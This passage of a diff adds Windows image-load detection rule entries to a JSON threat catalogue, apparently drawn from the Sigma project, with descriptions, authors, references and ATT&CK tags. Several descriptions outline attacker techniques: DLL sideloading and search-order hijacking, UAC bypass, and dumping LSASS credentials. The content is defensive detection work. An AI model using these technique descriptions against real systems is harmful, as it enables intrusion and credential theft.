"Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbgcore_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL" + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbghelp_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL" + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "filename": "image_load_side_load_from_non_system_location.yml", + 
"level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_office_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_scm.yml", + "level": 
"medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_third_party.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "filename": "image_load_side_load_vmguestlib.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_web_browsers.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL" + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "meta": { + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + 
"creation_date": "2021/06/29", + "falsepositive": [ + "Loading of legitimate driver" + ], + "filename": "image_load_spoolsv_dll_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load" + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "meta": { + "author": "frack113", + "creation_date": "2022/02/03", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_advapi32_dll.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll" + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unikely" + ], + "filename": "image_load_susp_cmstp.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load" + }, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dll_load_system_process.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations" + }, + { + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_susp_fax_dll.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack" + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": 
"ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications" + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications" + }, + { + "description": "Detects any GAC DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications" + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, 
will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications" + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications" + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "meta": { + "author": "Patrick St. 
John, OTR (Open Threat Research)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "filename": "image_load_susp_python_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.py2exe.org/", + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ] + }, + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load" + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "meta": { + "author": "omkar72, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://thewover.github.io/Introducing-Donut/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications" + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. 
This could be an indicator of potential Screen Capture.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_system_drawing_load.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load" + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/01/07", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "filename": "image_load_susp_uncommon_image_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading" + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "meta": { + "author": "frack113", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/ORCx41/DeleteShadowCopies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS Dll by Uncommon Executable" + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "meta": { + "author": "Markus Neis, @markus_neis", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_ps_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable" + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_winword_vbadll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via 
Microsoft Word" + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "meta": { + "author": "SBousseaden", + "creation_date": "2019/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack" + }, + { + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "image_load_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image" + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_uac_bypass_iscsicpl.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad" + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + "meta": { + 
"author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/06", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "filename": "image_load_uac_bypass_via_dism.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ] + }, + "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL" + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." 
+ ], + "filename": "image_load_uipromptforcreds_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs" + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "filename": "image_load_unsigned_image_loaded_into_lsass.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process" + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/07", + "falsepositive": [ + "Rarely observed" + ], + "filename": "image_load_usp_svchost_clfsw32.yml", + 
"level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern" + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from Nondefault Path" + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/17", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. 
